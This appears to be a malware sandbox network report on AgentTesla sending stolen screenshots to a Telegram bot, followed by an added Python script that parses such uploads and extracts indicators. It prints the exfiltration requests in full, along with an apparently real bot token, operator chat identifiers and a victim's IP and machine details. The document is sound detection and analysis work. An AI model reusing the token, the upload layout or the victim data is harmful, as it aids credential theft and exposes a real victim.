Session ID: 5 | Source IP: 192.168.2.5 | Source Port: 49719 | Destination IP: 149.154.167.220 | Destination Port: 443 | PID: 3472 | Process: C:\Users\user\Desktop\z1E-catalogSamples.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-19 17:34:35 UTC | 238 | OUT | POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1
    Content-Type: multipart/form-data; boundary=---------------------------8dc6905e4c74819
    Host: api.telegram.org
    Content-Length: 67144
    Expect: 100-continue
2024-04-19 17:34:35 UTC | 1024 | OUT | Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 36 39 30 35 65 34 63 37 34 38 31 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 32 31 30 35 35 38 34 39 32 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 36 39 30 35 65 34 63 37 34 38 31 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 34 2f 33 30 2f 32 30 32 34 20 31 31 3a 30 38 3a 34 30 0a 55 73 65 72
    Data Ascii: -----------------------------8dc6905e4c74819Content-Disposition: form-data; name="chat_id"1210558492-----------------------------8dc6905e4c74819Content-Disposition: form-data; name="caption"New SC Recovered!Time: 04/30/2024 11:08:40User
2024-04-19 17:34:35 UTC | 16355 | OUT | Data Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14
    Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"|
2024-04-19 17:34:35 UTC | 16355 | OUT | Data Raw: e7 92 7f df 22 9c aa aa 30 a0 01 e8 2b 4a 58 19 c6 a2 94 a4 ac 8c eb 66 b4 1d 19 c2 9c 5d e4 ad ad 85 a2 8a 2b d5 3e 78 28 a2 8a 00 b5 a5 b2 a6 a9 6a cc 42 a8 95 49 24 e0 01 9a ee 3e dd 67 ff 00 3f 70 7f df c5 ff 00 1a f3 da 2b 8e be 17 db 4b 9a f6 3d 0c 2e 3b ea f0 70 e5 be bd cf 42 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a 4f b7 d9 7f cf e5 bf fd fd 5f f1 af 3e a2 b0 fe cf fe f7 e1 ff 00 04 e9 fe d5 fe e7 e3 ff 00 00 ea 7c 4f 75 6d 36 9a 89 0d c4 52 37 9a 0e 11 c1 38 c1 f4 ae 56 8a 2b b3 0f 47 d8 c7 96 f7 38 31 58 8f ac 4d 4a d6 d0 28 a2 8a dc e6 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 04 a2 8a 28 18 51 45 14 c0 4a 29 68 a0 04 a2 8a 5a 00 4a 28 a2 80 0a 4a 5a 4a 06 14 51 45 30 0a 28 a2 80 12 8a 5a 4a 06 14 51
    Data Ascii: "0+JXf]+>x(jBI$>g?p+K=.;pB}[O_>|Oum6R78V+G81XMJ(((JZ((((((QEJ)hZJ(JZJQE0(ZJQ
2024-04-19 17:34:35 UTC | 16355 | OUT | Data Raw: d9 f2 82 51 45 14 00 57 49 e0 bf f9 06 dd 7f d7 d3 ff 00 25 ae 6e ba 4f 05 ff 00 c8 36 eb fe be 9f f9 2d 79 79 8f d8 f9 9f 41 92 fc 35 7d 17 e6 6f 4b 22 43 13 cb 23 05 44 05 98 9e c0 57 19 a1 eb 31 5a de de 5e cc 9f ba bb 72 ec 63 52 4c 58 27 01 bb 73 9a d6 d5 34 7b ed 57 50 29 3c 81 6c 43 02 30 e7 ee 80 32 02 fa 93 9e 4e 6b 71 21 8a 38 04 09 1a 88 82 ed 09 8e 31 e9 5e 3b 52 9c ae b4 b1 f4 d0 9d 2a 14 9c 5f bc e5 bd ba 2f f3 ff 00 22 b5 96 a7 6d 7b 2b c3 19 75 95 14 31 49 10 a9 c1 e8 7d c5 73 3e 2a ff 00 91 8a 3f fa f5 1f fa 19 ae ae da c6 d2 d1 99 ad ad a2 85 9b ef 14 40 33 5c a7 8a bf e4 62 8f fe bd 47 fe 86 6b a2 85 fd a4 2f dc e1 c4 f2 7b 1a bc 9b 72 bd fe 46 65 14 51 5f 48 7c 38 51 45 14 00 51 45 14 0c 28 a2 8a 00 28 a2 8a 00 4a 29 68 a0 04 a2 96 8a
    Data Ascii: QEWI%nO6-yyA5}oK"C#DW1Z^rcRLX's4{WP)<lC02Nkq!81^;R*_/"m{+u1I}s>*?@3\bGk/{rFeQ_H|8QEQE((J)h
2024-04-19 17:34:35 UTC | 15447 | OUT | Data Raw: a2 8a 29 80 51 45 14 00 51 45 14 00 94 51 45 03 0a 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 25 14 51 40 05 14 51 40 c2 90 d2 f6 a4 a0 02 8a 28 a0 04 a2 8a 28 18 52 52 d2 50 01 45 14 50 02 51 4b 49 40 c2 8a 28 a0 02 92 8a 29 8c 28 a2 8a 00 4a 28 cd 26 68 18 b4 94 94 50 16 0c fb 52 66 8a 28 18 52 52 d2 50 01 49 4b 49 40 c2 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28 a2 8a 06 21 a2 8a 28 00 a4 a5 a4 a0 61 49 4b 49 40 05 25 2d 14 14 25 14 52 50 08 5a 4a 28 a0 04 34 51 45 03 0a 4a 5a 4a 06 14 94 51 40 09 45 2d 25 03 0a 4a 5a 4a 06 14 94 51 40 05 25 2d 14 0c 4a 28 a2 81 85 25 14 94 00 b4 94 51 40 c3 8a 29 28 a0 02 8a 28 a0 62 51 45 14 0c 4a 28 a2 80 0a 28 a4 a6 30 fe 74 51 f9 50 69 0c 43 c7 34 51 45 30 13 f1 a3 8a 28 a0 61 49 c5 2d 27 14 80 3d e8 fa 51 45
    Data Ascii: )QEQEQEJZJ(QE%Q@Q@((RRPEPQKI@()(J(&hPRf(RRPIKI@(aIERRP0((!(aIKI@%-%RPZJ(4QEJZJQ@E-%JZJQ@%-J(%Q@)((bQEJ((0tQPiC4QE0(aI-'=QE
2024-04-19 17:34:35 UTC | 1558 | OUT | Data Raw: e8 51 e7 c3 ff 00 3d 53 fe fa 14 01 25 15 1f 9f 0f fc f5 4f fb e8 51 e7 c3 ff 00 3d 53 fe fa 14 01 25 15 1f 9f 0f fc f5 4f fb e8 51 e7 c3 ff 00 3d 53 fe fa 14 01 25 15 1f 9f 0f fc f5 4f fb e8 51 e7 c3 ff 00 3d 53 fe fa 14 01 25 15 1f 9f 0f fc f5 4f fb e8 51 e7 c3 ff 00 3d 53 fe fa 14 01 25 15 1f 9f 0f fc f5 4f fb e8 51 e7 c3 ff 00 3d 53 fe fa 14 01 25 15 1f 9f 0f fc f5 4f fb e8 51 e7 c3 ff 00 3d 53 fe fa 14 01 25 15 1f 9f 0f fc f5 4f fb e8 51 e7 c3 ff 00 3d 53 fe fa 14 00 4f ff 00 1e f2 7f ba 7f 95 7c f3 5f 41 cd 34 46 09 00 91 09 2a 7f 88 7a 57 cf 95 71 33 98 56 e6 99 e2 49 ec ec 7e c1 73 6b 05 fd 9e 77 2c 37 0b 90 a7 d4 1e df 85 61 d1 54 41 b9 a9 f8 92 7b cb 1f b0 5b 5a c1 61 67 9d cd 0d ba e0 31 f5 27 bf e3 58 74 51 40 05 14 51 4c 02 b5 ee 7c 4f ae 5c 5d 4b 3f f6 ad e4 5e 63 97 f2 e2 b8 75 45 c9 ce 14 67 80 3b 56
    Data Ascii: Q=S%OQ=S%OQ=S%OQ=S%OQ=S%OQ=S%OQ=SO|_A4F*zWq3VI~skw,7aTA{[Zag1'XtQ@QL|O\]K?^cuEg;V
2024-04-19 17:34:35 UTC | 50 | OUT | Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 36 39 30 35 65 34 63 37 34 38 31 39 2d 2d 0d 0a
    Data Ascii: -----------------------------8dc6905e4c74819--
2024-04-19 17:34:35 UTC | 25 | IN | HTTP/1.1 100 Continue
2024-04-19 17:34:36 UTC | 1482 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Fri, 19 Apr 2024 17:34:36 GMT
    Content-Type: application/json
    Content-Length: 1093
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET, POST, OPTIONS
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    {"ok":true,"result":{"message_id":3412,"from":{"id":7177134832,"is_bot":true,"first_name":"bng_bot","username":"shanny1975_bot"},"chat":{"id":1210558492,"first_name":"kelv","last_name":"calin","type":"private"},"date":1713548076,"document":{"file_name":"user-618321 2024-04-30 11-08-41.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAg1UZiKrLDnbUIdgcmcpSX4fDVFbjYAAAq4XAAKLUhlRBZsefgJ4hMkBAAdtAAM0BA","file_unique_id":"AQADrhcAAotSGVFy","file_size":12508,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAg1UZiKrLDnbUIdgcmcpSX4fDVFbjYAAAq4XAAKLUhlRBZsefgJ4hMkBAAdtAAM0BA","file_unique_id":"AQADrhcAAotSGVFy","file_size":12508,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAINVGYiqyw521CHYHJnKUl-Hw1RW42AAAKuFwACi1IZUQWbHn4CeITJNAQ","file_unique_id":"AgADrhcAAotSGVE","file_size":66521},"caption":"New SC Recovered!\n\nTime: 04/30/2024 11:08:40\nUser Name: user/618321\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 81.181.57.52","caption_entities":[{"offset":179,"length":12,"type":"url"}]}}

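The sessions above show the two halves of AgentTesla's Telegram channel: a GET to api.ipify.org to learn the victim's public address, then multipart/form-data POSTs to /bot<token>/sendDocument carrying a chat_id, a caption ("New PW Recovered!" for credentials, "New SC Recovered!" for a screenshot, each followed by "Key: value" host-fingerprint lines) and the stolen file. The bot token in the URL path is the bot's credential and the chat_id is the operator's private chat, so together with the bot username and chat display name echoed back in Telegram's JSON reply they are the IOCs worth extracting. Note that the caption "Time" fields of the screenshot uploads (04/24, 04/30, 05/07) run days ahead of the 2024-04-19 capture clock, most likely because the sandbox advances the clock to get past the long sleeps flagged in the signatures (an inference, not stated in the report), so a detector should key on the caption structure, not its timestamp. The following Python is an added example written for this page, not Joe Sandbox or AgentTesla code: it parses a raw request the way the captures are laid out, flags the Telegram bot upload and the external-IP lookup, extracts token, chat_id, victim fingerprint and document name, and pulls the operator fields out of the reply. The sample messages are constructed (CRLFs restored, a short stand-in HTML body instead of the real one; the ipinfo.io and checkip.dyndns.org hosts are assumptions, only api.ipify.org appears in this report).

```python
# Added example (not Joe Sandbox or AgentTesla code): parse the Telegram Bot API
# uploads and the external-IP lookup captured above and extract the IOCs.
import json
import re

# Bot token = "<numeric bot id>:<secret>"; the secret here is 35 chars, range kept loose.
TELEGRAM_BOT_PATH = re.compile(rb"^(?:POST|GET) /bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]{30,50})"
                               rb"/(?P<api>\w+)(?:\?\S*)? HTTP/1\.[01]$")
AGENTTESLA_CAPTION = re.compile(r"^New (?P<kind>[A-Z]{2}) Recovered!")   # PW = passwords, SC = screenshot
EXTERNAL_IP_HOSTS = {"api.ipify.org", "ipinfo.io", "checkip.dyndns.org"}  # only ipify is in this report

def split_http_request(raw: bytes):
    """(request line, lower-cased header dict, body) for one raw HTTP/1.x request."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.decode("latin-1").partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body

def parse_multipart(body: bytes, boundary: str) -> dict:
    """multipart/form-data -> {field: (filename or None, value bytes)}. The CRLF before
    each "--boundary" belongs to the delimiter (RFC 2046), so binary parts stay byte-exact."""
    if body.startswith(b"--"):             # client omitted the leading CRLF
        body = b"\r\n" + body
    parts = {}
    for chunk in body.split(b"\r\n--" + boundary.encode()):
        if not chunk.startswith(b"\r\n"):   # empty preamble or the closing "--"
            continue
        part_head, _, part_body = chunk[2:].partition(b"\r\n\r\n")
        name = re.search(rb'[;\s]name="([^"]*)"', part_head)   # must not match filename=
        fname = re.search(rb'filename="([^"]*)"', part_head)
        if name:
            parts[name.group(1).decode()] = (fname.group(1).decode() if fname else None, part_body)
    return parts

def parse_caption(caption: str) -> dict:
    """'Key: value' caption lines -> dict; 'kind' is the PW/SC tag from the first line."""
    info = {}
    if m := AGENTTESLA_CAPTION.match(caption):
        info["kind"] = m.group("kind")
    for line in caption.splitlines():
        key, sep, value = line.partition(": ")
        if sep:
            info[key.strip()] = value.strip()
    return info

def analyze_request(raw: bytes):
    """Finding for a Telegram bot upload or an external-IP lookup, else None."""
    request_line, headers, body = split_http_request(raw)
    host = headers.get("host", "")
    if host in EXTERNAL_IP_HOSTS:
        return {"indicator": "external-ip-lookup", "host": host}
    m = TELEGRAM_BOT_PATH.match(request_line)   # path-based, so it also fires if Host is an IP
    if not m:
        return None
    finding = {"indicator": "telegram-bot-exfil", "host": host, "api_method": m.group("api").decode(),
               "bot_id": m.group("bot_id").decode(),
               "token": (m.group("bot_id") + b":" + m.group("secret")).decode()}
    bm = re.search(r'boundary="?([^";]+)"?', headers.get("content-type", ""))
    if bm:
        parts = parse_multipart(body, bm.group(1))
        if "chat_id" in parts:
            finding["chat_id"] = parts["chat_id"][1].decode(errors="replace")
        if "caption" in parts:
            finding["victim"] = parse_caption(parts["caption"][1].decode(errors="replace"))
        if "document" in parts:
            finding["document"] = {"filename": parts["document"][0], "size": len(parts["document"][1])}
    return finding

def attribution_from_response(json_body: bytes) -> dict:
    """Operator-identifying fields from Telegram's sendDocument reply."""
    r = json.loads(json_body)["result"]
    chat = r["chat"]
    return {"bot_username": r["from"].get("username"), "chat_id": chat["id"],
            "chat_name": " ".join(n for n in (chat.get("first_name"), chat.get("last_name")) if n),
            "file_id": r.get("document", {}).get("file_id")}

def build_multipart(boundary: str, fields) -> bytes:
    """Body with the same layout as the capture; used here only to construct the sample."""
    out = b""
    for name, filename, value in fields:
        disp = f'Content-Disposition: form-data; name="{name}"'
        if filename:
            disp += f'; filename="{filename}"\r\nContent-Type: text/html'
        out += b"\r\n--" + boundary.encode() + b"\r\n" + disp.encode() + b"\r\n\r\n" + value
    return out + b"\r\n--" + boundary.encode() + b"--\r\n"

# Constructed samples mirroring sessions 1-3 above (token, chat_id and caption copied from the report).
BOUNDARY = "---------------------------8dc60a788f191e0"
SAMPLE_DOC = b"<html><body><table><tr><td>https://example.com</td><td>victim</td><td>hunter2</td></tr></table></body></html>"
SAMPLE_CAPTION = ("New PW Recovered!\n\nTime: 04/19/2024 19:33:05\nUser Name: user/618321\nOSFullName: Microsoft Windows 10 Pro\n"
                  "CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 81.181.57.52")
SAMPLE_TELEGRAM = (b"POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1\r\n"
                   + f"Content-Type: multipart/form-data; boundary={BOUNDARY}\r\n".encode()
                   + b"Host: api.telegram.org\r\nExpect: 100-continue\r\nConnection: Keep-Alive\r\n\r\n"
                   + build_multipart(BOUNDARY, [("chat_id", None, b"1210558492"), ("caption", None, SAMPLE_CAPTION.encode()),
                                                ("document", "user-618321 2024-04-19 19-33-05.html", SAMPLE_DOC)]))
SAMPLE_IPIFY = (b"GET / HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0\r\n"
                b"Host: api.ipify.org\r\nConnection: Keep-Alive\r\n\r\n")
SAMPLE_RESPONSE = (b'{"ok":true,"result":{"message_id":3318,"from":{"id":7177134832,"is_bot":true,"first_name":"bng_bot",'
                   b'"username":"shanny1975_bot"},"chat":{"id":1210558492,"first_name":"kelv","last_name":"calin",'
                   b'"type":"private"},"date":1713547986,"document":{"file_name":"user-618321 2024-04-19 19-33-05.html",'
                   b'"mime_type":"text/html","file_id":"BQACAgQAAxkDAAIM9mYiqtL-K8bdpKuwa8f63o3UMu4VAAKnFwACi1IZUdt_S1JLSfEINAQ",'
                   b'"file_unique_id":"AgADpxcAAotSGVE","file_size":348}}}')

if __name__ == "__main__":
    for raw in (SAMPLE_IPIFY, SAMPLE_TELEGRAM):
        print(analyze_request(raw))
    print(attribution_from_response(SAMPLE_RESPONSE))
```

Matching on the /bot<id>:<secret>/ path rather than only on the Host header keeps the rule effective if a sample talks to 149.154.167.220 directly; the multipart splitter deliberately treats the CRLF before each delimiter as part of the delimiter so the recovered document (the HTML or JPEG) is byte-exact and can be hashed or carved for the stolen data.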

Session ID: 6 | Source IP: 192.168.2.5 | Source Port: 49720 | Destination IP: 149.154.167.220 | Destination Port: 443 | PID: 3472 | Process: C:\Users\user\Desktop\z1E-catalogSamples.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-19 17:34:58 UTC | 262 | OUT | POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1
    Content-Type: multipart/form-data; boundary=---------------------------8dc6e654d78418e
    Host: api.telegram.org
    Content-Length: 67144
    Expect: 100-continue
    Connection: Keep-Alive
2024-04-19 17:34:58 UTC | 1024 | OUT | Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 36 65 36 35 34 64 37 38 34 31 38 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 32 31 30 35 35 38 34 39 32 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 36 65 36 35 34 64 37 38 34 31 38 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 35 2f 30 37 2f 32 30 32 34 20 30 37 3a 30 39 3a 31 31 0a 55 73 65 72
    Data Ascii: -----------------------------8dc6e654d78418eContent-Disposition: form-data; name="chat_id"1210558492-----------------------------8dc6e654d78418eContent-Disposition: form-data; name="caption"New SC Recovered!Time: 05/07/2024 07:09:11User
2024-04-19 17:34:58 UTC | 16355 | OUT | Data Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14
    Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"|
2024-04-19 17:34:58 UTC | 16355 | OUT | Data Raw: e7 92 7f df 22 9c aa aa 30 a0 01 e8 2b 4a 58 19 c6 a2 94 a4 ac 8c eb 66 b4 1d 19 c2 9c 5d e4 ad ad 85 a2 8a 2b d5 3e 78 28 a2 8a 00 b5 a5 b2 a6 a9 6a cc 42 a8 95 49 24 e0 01 9a ee 3e dd 67 ff 00 3f 70 7f df c5 ff 00 1a f3 da 2b 8e be 17 db 4b 9a f6 3d 0c 2e 3b ea f0 70 e5 be bd cf 42 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a 4f b7 d9 7f cf e5 bf fd fd 5f f1 af 3e a2 b0 fe cf fe f7 e1 ff 00 04 e9 fe d5 fe e7 e3 ff 00 00 ea 7c 4f 75 6d 36 9a 89 0d c4 52 37 9a 0e 11 c1 38 c1 f4 ae 56 8a 2b b3 0f 47 d8 c7 96 f7 38 31 58 8f ac 4d 4a d6 d0 28 a2 8a dc e6 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 04 a2 8a 28 18 51 45 14 c0 4a 29 68 a0 04 a2 8a 5a 00 4a 28 a2 80 0a 4a 5a 4a 06 14 51 45 30 0a 28 a2 80 12 8a 5a 4a 06 14 51
    Data Ascii: "0+JXf]+>x(jBI$>g?p+K=.;pB}[O_>|Oum6R78V+G81XMJ(((JZ((((((QEJ)hZJ(JZJQE0(ZJQ
2024-04-19 17:34:58 UTC | 16355 | OUT | Data Raw: d9 f2 82 51 45 14 00 57 49 e0 bf f9 06 dd 7f d7 d3 ff 00 25 ae 6e ba 4f 05 ff 00 c8 36 eb fe be 9f f9 2d 79 79 8f d8 f9 9f 41 92 fc 35 7d 17 e6 6f 4b 22 43 13 cb 23 05 44 05 98 9e c0 57 19 a1 eb 31 5a de de 5e cc 9f ba bb 72 ec 63 52 4c 58 27 01 bb 73 9a d6 d5 34 7b ed 57 50 29 3c 81 6c 43 02 30 e7 ee 80 32 02 fa 93 9e 4e 6b 71 21 8a 38 04 09 1a 88 82 ed 09 8e 31 e9 5e 3b 52 9c ae b4 b1 f4 d0 9d 2a 14 9c 5f bc e5 bd ba 2f f3 ff 00 22 b5 96 a7 6d 7b 2b c3 19 75 95 14 31 49 10 a9 c1 e8 7d c5 73 3e 2a ff 00 91 8a 3f fa f5 1f fa 19 ae ae da c6 d2 d1 99 ad ad a2 85 9b ef 14 40 33 5c a7 8a bf e4 62 8f fe bd 47 fe 86 6b a2 85 fd a4 2f dc e1 c4 f2 7b 1a bc 9b 72 bd fe 46 65 14 51 5f 48 7c 38 51 45 14 00 51 45 14 0c 28 a2 8a 00 28 a2 8a 00 4a 29 68 a0 04 a2 96 8a
    Data Ascii: QEWI%nO6-yyA5}oK"C#DW1Z^rcRLX's4{WP)<lC02Nkq!81^;R*_/"m{+u1I}s>*?@3\bGk/{rFeQ_H|8QEQE((J)h
2024-04-19 17:34:58 UTC | 15447 | OUT | Data Raw: a2 8a 29 80 51 45 14 00 51 45 14 00 94 51 45 03 0a 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 25 14 51 40 05 14 51 40 c2 90 d2 f6 a4 a0 02 8a 28 a0 04 a2 8a 28 18 52 52 d2 50 01 45 14 50 02 51 4b 49 40 c2 8a 28 a0 02 92 8a 29 8c 28 a2 8a 00 4a 28 cd 26 68 18 b4 94 94 50 16 0c fb 52 66 8a 28 18 52 52 d2 50 01 49 4b 49 40 c2 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28 a2 8a 06 21 a2 8a 28 00 a4 a5 a4 a0 61 49 4b 49 40 05 25 2d 14 14 25 14 52 50 08 5a 4a 28 a0 04 34 51 45 03 0a 4a 5a 4a 06 14 94 51 40 09 45 2d 25 03 0a 4a 5a 4a 06 14 94 51 40 05 25 2d 14 0c 4a 28 a2 81 85 25 14 94 00 b4 94 51 40 c3 8a 29 28 a0 02 8a 28 a0 62 51 45 14 0c 4a 28 a2 80 0a 28 a4 a6 30 fe 74 51 f9 50 69 0c 43 c7 34 51 45 30 13 f1 a3 8a 28 a0 61 49 c5 2d 27 14 80 3d e8 fa 51 45
    Data Ascii: )QEQEQEJZJ(QE%Q@Q@((RRPEPQKI@()(J(&hPRf(RRPIKI@(aIERRP0((!(aIKI@%-%RPZJ(4QEJZJQ@E-%JZJQ@%-J(%Q@)((bQEJ((0tQPiC4QE0(aI-'=QE
2024-04-19 17:34:58 UTC | 1558 | OUT | Data Raw: e8 51 e7 c3 ff 00 3d 53 fe fa 14 01 25 15 1f 9f 0f fc f5 4f fb e8 51 e7 c3 ff 00 3d 53 fe fa 14 01 25 15 1f 9f 0f fc f5 4f fb e8 51 e7 c3 ff 00 3d 53 fe fa 14 01 25 15 1f 9f 0f fc f5 4f fb e8 51 e7 c3 ff 00 3d 53 fe fa 14 01 25 15 1f 9f 0f fc f5 4f fb e8 51 e7 c3 ff 00 3d 53 fe fa 14 01 25 15 1f 9f 0f fc f5 4f fb e8 51 e7 c3 ff 00 3d 53 fe fa 14 01 25 15 1f 9f 0f fc f5 4f fb e8 51 e7 c3 ff 00 3d 53 fe fa 14 01 25 15 1f 9f 0f fc f5 4f fb e8 51 e7 c3 ff 00 3d 53 fe fa 14 00 4f ff 00 1e f2 7f ba 7f 95 7c f3 5f 41 cd 34 46 09 00 91 09 2a 7f 88 7a 57 cf 95 71 33 98 56 e6 99 e2 49 ec ec 7e c1 73 6b 05 fd 9e 77 2c 37 0b 90 a7 d4 1e df 85 61 d1 54 41 b9 a9 f8 92 7b cb 1f b0 5b 5a c1 61 67 9d cd 0d ba e0 31 f5 27 bf e3 58 74 51 40 05 14 51 4c 02 b5 ee 7c 4f ae 5c 5d 4b 3f f6 ad e4 5e 63 97 f2 e2 b8 75 45 c9 ce 14 67 80 3b 56
                                                                  Data Ascii: Q=S%OQ=S%OQ=S%OQ=S%OQ=S%OQ=S%OQ=SO|_A4F*zWq3VI~skw,7aTA{[Zag1'XtQ@QL|O\]K?^cuEg;V
                                                                  2024-04-19 17:34:58 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 36 65 36 35 34 64 37 38 34 31 38 65 2d 2d 0d 0a
                                                                  Data Ascii: -----------------------------8dc6e654d78418e--
                                                                  2024-04-19 17:34:58 UTC | 25 | IN | HTTP/1.1 100 Continue
                                                                  2024-04-19 17:34:59 UTC | 1482 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0
                                                                  Date: Fri, 19 Apr 2024 17:34:59 GMT
                                                                  Content-Type: application/json
                                                                  Content-Length: 1093
                                                                  Connection: close
                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                  Access-Control-Allow-Origin: *
                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
